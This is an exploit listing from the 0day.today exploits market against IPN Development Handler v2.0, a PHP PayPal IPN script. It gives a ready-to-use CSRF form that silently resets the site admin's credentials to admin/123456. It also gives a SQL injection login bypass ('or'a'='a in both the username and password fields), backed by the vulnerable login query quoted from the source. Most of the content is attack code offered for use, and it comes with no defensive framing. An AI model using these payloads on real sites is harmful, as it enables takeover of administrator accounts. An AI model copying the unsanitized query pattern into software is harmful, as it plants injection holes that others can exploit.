[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

IPN Development Handler v2.0 Multiple Vulnerabilities

Author
AtT4CKxT3rR0r1ST
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15231
Category
web applications
Date add
24-12-2010
Platform
php
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://scripts.filehungry.com/product/php/e-commerce/paypal/ipn_development_handler/
 
####################################################################
 
 
===[ Exploit ]===
 
<form method="POST" name="form0" action="http://localhost/siteadmin/EditInfo.php">
<input type="hidden" name="username" value="admin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="password2" value="123456"/>
<input type="hidden" name="s1" value="Update"/>
</form>
 
</body>
</html>
 
####################################################################
 
IPN Development Handler v2.0 Auth Bypass
==============================================================
 
####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://scripts.filehungry.com/product/php/e-commerce/paypal/ipn_development_handler/
 
####################################################################
 
===[ Vulnerability ]===
Source Code path/siteadmin/login.php
 
if(isset($_POST[s2]))
{
$MyUsername1 = strip_tags($_POST[username1]);
$MyPassword1 = strip_tags($_POST[password1]);
 
if(empty($MyUsername1) || empty($MyPassword1))
{
$MyError = "<center><font color=red size=2 face=verdana><b>All fields are required!</b></font></center>";
}
else
{
//check the login info if exists
$q1 = "select * from dd_admin where username = '$MyUsername1' and password = '$MyPassword1' ";
 
$r1 = mysql_query($q1);
 
if(!$r1)
{
echo mysql_error();
exit();
 
===[ Exploit ]===
 
1- Go to Siteadmin [www.site.com/siteadmin/login.php]
2- join code Auth Bypass in Username & Password
3- Username: 'or'a'='a
Password: 'or'a'='a
 
 
####################################################################



#  0day.today [2024-07-04]  #